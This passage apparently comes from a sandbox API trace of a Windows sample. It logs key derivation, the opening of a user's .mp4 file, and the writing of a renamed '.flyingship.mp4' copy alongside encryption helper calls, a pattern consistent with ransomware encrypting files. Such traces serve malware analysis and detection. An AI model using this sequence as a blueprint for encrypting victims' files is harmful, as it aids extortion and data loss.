Size=0x10) returned 0x9bd990 [0162.162] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0162.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0162.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0162.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0162.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0162.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0162.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0162.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0162.163] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0162.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0162.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0162.163] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.163] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0162.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0162.163] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0162.163] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0162.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0162.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d460 [0162.163] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.163] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0162.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0162.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0162.163] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0162.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0162.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0162.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0162.163] CryptDestroyHash (hHash=0x90ae18) returned 1 [0162.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0162.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0162.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0162.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0162.164] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.164] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.164] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.164] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.164] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.165] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ltz4mbbpxnfpfin1jbh3\\qpuo-bpnhjloiyjrui7.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0162.165] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0162.165] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0162.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0162.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0162.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0162.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0162.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0162.165] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0162.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0162.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0162.166] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0162.166] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0162.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0162.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0162.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0162.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0162.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0162.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0162.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3478 | out: hHeap=0x8a0000) returned 1 [0162.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0162.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0162.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0162.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0162.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0162.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0162.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0162.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0162.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0162.166] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ltz4mbbpxnfpfin1jbh3")) returned 0x10 [0162.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0162.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0162.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0162.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0162.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0162.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0162.167] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.flyingship.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ltz4mbbpxnfpfin1jbh3\\qpuo-bpnhjloiyjrui7.flyingship.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0162.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0162.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0162.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0162.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0162.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0162.169] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0162.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0162.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0162.169] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0162.169] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.169] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0162.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0162.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0162.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0162.169] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0162.170] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0xf55d, lpOverlapped=0x0) returned 1 [0162.172] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0162.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0162.172] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0162.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0162.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0162.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0162.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0162.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0162.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0162.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9e5190 | out: hHeap=0x8a0000) returned 1 [0162.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0162.173] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0162.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9e5190 | out: hHeap=0x8a0000) returned 1 [0162.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0162.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0162.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0162.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0162.174] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0162.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0162.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0162.174] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.174] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0162.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0162.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0162.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0162.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0162.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0162.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0162.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0162.174] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0162.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0162.174] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0162.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0162.175] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0162.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0162.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0162.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0162.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0162.175] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0162.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0162.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0162.175] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0162.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0162.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0162.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0162.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0162.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0162.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0162.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0162.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0162.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0162.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0162.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0162.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.175] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0162.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0162.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0162.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0162.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0162.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0162.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0162.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0162.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0162.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0162.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0162.176] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0162.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0162.176] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0162.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0162.176] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0162.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0162.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0162.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0162.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0162.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0162.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0162.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0162.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0162.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0162.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0162.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0162.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0162.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0162.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0162.177] HeapFree 